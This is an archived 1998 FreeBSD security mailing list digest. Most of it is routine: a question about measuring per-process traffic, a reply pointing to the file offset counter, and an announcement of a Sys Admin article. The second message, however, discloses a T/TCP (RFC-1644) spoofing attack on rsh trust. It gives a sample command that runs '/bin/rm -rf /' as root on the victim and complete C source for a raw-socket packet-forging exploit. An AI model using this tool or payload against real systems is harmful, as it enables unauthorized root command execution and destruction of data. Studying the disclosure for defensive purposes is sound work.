From owner-freebsd-security Sun Apr 5 07:17:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA22583 for freebsd-security-outgoing; Sun, 5 Apr 1998 07:17:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from throne.rau.lv (mg@throne.rau.lv [159.148.112.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA22569 for ; Sun, 5 Apr 1998 07:16:52 -0700 (PDT) (envelope-from mg@throne.rau.lv) Received: from localhost (mg@localhost) by throne.rau.lv with SMTP id RAA17584 for ; Sun, 5 Apr 1998 17:23:37 +0300 (EEST) Posted-Date: Sun, 5 Apr 1998 17:23:37 +0300 (EEST) Date: Sun, 5 Apr 1998 17:23:37 +0300 (EEST) From: Michael Gulyaev To: freebsd-security@FreeBSD.ORG Subject: tcp/ip stack & user process Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi, Does anybody know, how can create a link between tcp/ip stack and user process ? So, if it possible, you can look how many bytes user up & down loading during session... Any ideas are welcome.... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Apr 7 06:27:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA24214 for freebsd-security-outgoing; Tue, 7 Apr 1998 06:27:08 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from uddias.diaspro.com (uddias.diaspro.com [194.84.211.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA24204 for ; Tue, 7 Apr 1998 06:26:57 -0700 (PDT) (envelope-from vasim@diaspro.com) Received: from localhost (localhost.diaspro.com [127.0.0.1]) by uddias.diaspro.com (8.8.8/8.8.8) with SMTP id TAA18301; Tue, 7 Apr 1998 19:26:41 +0600 (ESS) (envelope-from vasim@diaspro.com) Date: Tue, 7 Apr 1998 19:26:41 +0600 (ESS) From: Vasim Valejev To: freebsd-security@FreeBSD.ORG cc: bugtraq@netspace.org Subject: Example of RFC-1644 attack Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk Hi ! Good news : SYN-flood attack with TTCP-packets will have null effects at most systems . But attacks on some tcp-services can be successful : Simple network : computer 'victim' and computer 'master' with link > 10 ms delay . Victim have '+master' in /etc/hosts.equiv and 'shell stream ... rshd' in /etc/inetd.conf . Both computers have t/tcp (rfc-1644) support . 1. Master does any t/tcp connections to victim . Victim's cache[master].cc sets to value > 0 . ... Time passed ... 2. Hacker runs command : hacker# 1644 master victim 514 '\0root\0root\0/bin/rm -rf /\0\0' Hacker's computer sends T/TCP packet (SYN+PUSH+data) to 'victim' with source address of 'master' . CC value in packet may be any > cache[master].cc (0xffffffff for example) . 3. Hacker's packet received and victim sends SYN+ACK packet to master . Preparing to run rshd with hacker's data ('rm -rf /' as root) . ... 10-50 ms passed ... 4. Victim's packet received and master sends RST packet . Too late , sorry ... FreeBSD version of 1644 (use ip addresses only) : /* 1644 by Vasim V. */ /* Please , don't use this program for any destructive targets ! */ #include #include #include #include #include #include #include #include #include #include #include #define NEED_NEWCC 0x01 #define NEED_FIN 0x02 #define NEED_PUSH 0x04 #define NEED_TSTAMP 0x08 struct fhdr { u_long saddr; u_long daddr; u_char zero; u_char protocol; u_short length; }; unsigned long cc = 0x7fffff00; u_short in_cksum(u_short *data,u_short length) { long value; u_short i; value = 0; for(i=0; i < (length >> 1); i++) value+=data[i]; if (length & 1) value+=*(((u_char *) data) + length - 1); value=(value & 65535) + (value >> 16); return(~value); } void sendpack(int sock, u_long saddr, u_long daddr, u_short port, u_char *data, int length, int options) { struct ip *mip; struct tcphdr *mtcp; struct fhdr *fhdr; int totlen; u_char buf[9000]; struct timeval tp; struct sockaddr_in sin; gettimeofday(&tp, NULL); srandom(tp.tv_usec); if (cc == 0) cc = tp.tv_sec; totlen = sizeof(struct ip) + sizeof(struct tcphdr); mtcp = (struct tcphdr *) (buf + sizeof(struct ip)); mtcp->th_sport = htons(512 + (random() % 512)); mtcp->th_dport = htons(port); mtcp->th_seq = htonl(random()); mtcp->th_ack = 0; mtcp->th_x2 = 0; mtcp->th_flags = TH_SYN; if (options & NEED_FIN) mtcp->th_flags |= TH_FIN; if (options & NEED_PUSH) mtcp->th_flags |= TH_PUSH; mtcp->th_win = htons(17244); mtcp->th_urp = 0; mtcp->th_sum = 0; buf[totlen++] = TCPOPT_MAXSEG; buf[totlen++] = TCPOLEN_MAXSEG; *((u_short *) &buf[totlen]) = htons(1460); totlen += sizeof(u_short); if (options & NEED_TSTAMP) { *((u_long *) &buf[totlen]) = htonl(TCPOPT_NOP << 24 | TCPOPT_WINDOW << 16 | TCPOLEN_WINDOW << 8); totlen += sizeof(u_long); *((u_long *) &buf[totlen]) = htonl(TCPOPT_TSTAMP_HDR); totlen += sizeof(u_long); *((u_long *) &buf[totlen]) = htonl(tp.tv_sec); totlen += sizeof(u_long); *((u_long *) &buf[totlen]) = 0; totlen += sizeof(u_long); } buf[totlen++] = TCPOPT_NOP; buf[totlen++] = TCPOPT_NOP; if (options & NEED_NEWCC) buf[totlen++] = TCPOPT_CCNEW; else buf[totlen++] = TCPOPT_CC; buf[totlen++] = TCPOLEN_CC; *((u_long *) &buf[totlen]) = htonl(cc); cc++; totlen += sizeof(u_long); mtcp->th_off = (totlen - sizeof(struct ip)) >> 2; if (data && length) memcpy(buf + totlen, data, length); fhdr = (struct fhdr *) (buf + sizeof(struct ip) - sizeof(struct fhdr)); fhdr->saddr = saddr; fhdr->daddr = daddr; fhdr->zero = 0; fhdr->protocol = IPPROTO_TCP; fhdr->length = htons(totlen - sizeof(struct ip) + length); mtcp->th_sum = in_cksum((u_short *) fhdr, totlen - sizeof(struct ip) + sizeof(struct fhdr) + length); mip = (struct ip *) buf; mip->ip_len = totlen + length; mip->ip_v = 4; mip->ip_hl = 5; mip->ip_tos = 0; mip->ip_id = htons(random() % 32768); mip->ip_off = IP_DF; mip->ip_ttl = 0x40; mip->ip_p = IPPROTO_TCP; mip->ip_sum = 0; mip->ip_src.s_addr = saddr; mip->ip_dst.s_addr = daddr; mip->ip_sum = in_cksum((u_short *) mip, sizeof(struct ip)); memset((void *) &sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = daddr; sin.sin_port = htons(port); if (sendto(sock, buf, totlen + length, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr_in)) < 0) perror("sendto"); } void main (int argc, char **argv) { u_long saddr; u_long daddr; int port; int sock; u_char buf[8192]; int len; int i; u_char *p; u_char c; if (argc != 5) { fprintf(stderr, "\n1644 by Vasim V.\n\nUsage: %s source destination port data\n", argv[0]); exit(1); } saddr = inet_addr(argv[1]); daddr = inet_addr(argv[2]); port = atoi(argv[3]); sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP); if (sock < 0) { perror("raw socket"); exit(2); } i = 1; setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)); p = buf; len = 0; for(i = 0; i < strlen(argv[4]); i++) { c = argv[4][i]; if (c == '\\') { i++; c = argv[4][i]; switch (c) { case '0': *p++ = '\0'; break; case 'r': *p++ = '\r'; break; case 'n': *p++ = '\n'; break; default: *p++ = c; break; } } else *p++ = c; len++; } sendpack(sock, saddr, daddr, port, buf, len, NEED_PUSH | NEED_TSTAMP); } Vasim V. (2:5011/27 http://members.tripod.com/~Vasim VV86-RIPE) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Apr 7 13:01:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA28530 for freebsd-security-outgoing; Tue, 7 Apr 1998 13:01:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from r.scl.ameslab.gov (r.scl.ameslab.gov [147.155.137.127]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA28477 for ; Tue, 7 Apr 1998 13:01:14 -0700 (PDT) (envelope-from ghelmer@scl.ameslab.gov) Received: from demios.scl.ameslab.gov (demios.ether.scl.ameslab.gov [147.155.137.54]) by r.scl.ameslab.gov (8.8.5/8.8.3) with SMTP id PAA29533 for ; Tue, 7 Apr 1998 15:01:12 -0500 (CDT) Date: Tue, 7 Apr 1998 15:01:11 -0500 (CDT) From: Guy Helmer To: freebsd-security@FreeBSD.ORG Subject: FreeBSD security article Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk An article that on which I've been working for a while will be published in the May 1998 issue of Sys Admin, the journal for UNIX systems administrators. The article is a survey of the security features of FreeBSD (many of the features are common to 4.4BSD-derived systems as well). For those who originally reviewed a precursor of this article last year (thanks to the *many* people who reviewed it and returned comments), you may remember the original paper tried to discuss all of the security issues and give some background rationale for the various issues. The published result is less ambitious (thank goodness!) but yet I hope it gives a good enough introduction to the various security features so that newer admins can understand the features and take advantage of them. As some reviewers suggested, there may be interest in how-to articles on securing a system, such as a web server. Unless someone beats me to it, maybe I'll work on such a thing this summer. Again, a public thanks to *everyone* who reviewed the previous paper and provided comments. Guy Helmer Guy Helmer, Graduate Student, Iowa State University Dept. of Computer Science Research Assistant, Ames Laboratory --- ghelmer@scl.ameslab.gov http://www.cs.iastate.edu/~ghelmer To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Apr 8 04:31:19 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA17143 for freebsd-security-outgoing; Wed, 8 Apr 1998 04:31:19 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA17130 for ; Wed, 8 Apr 1998 04:31:09 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199804081131.EAA17130@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA260265074; Wed, 8 Apr 1998 21:31:14 +1000 From: Darren Reed Subject: Re: tcp/ip stack & user process To: mg@rau.lv (Michael Gulyaev) Date: Wed, 8 Apr 1998 21:31:14 +1000 (EST) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Michael Gulyaev" at Apr 5, 98 05:23:37 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk In some mail from Michael Gulyaev, sie said: > > > Hi, > > Does anybody know, how can create a link between tcp/ip stack and user > process ? So, if it possible, you can look how many bytes user up & down > loading during session... > Any ideas are welcome.... The number of bytes is determinable by the file offset counter in the "struct file". Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message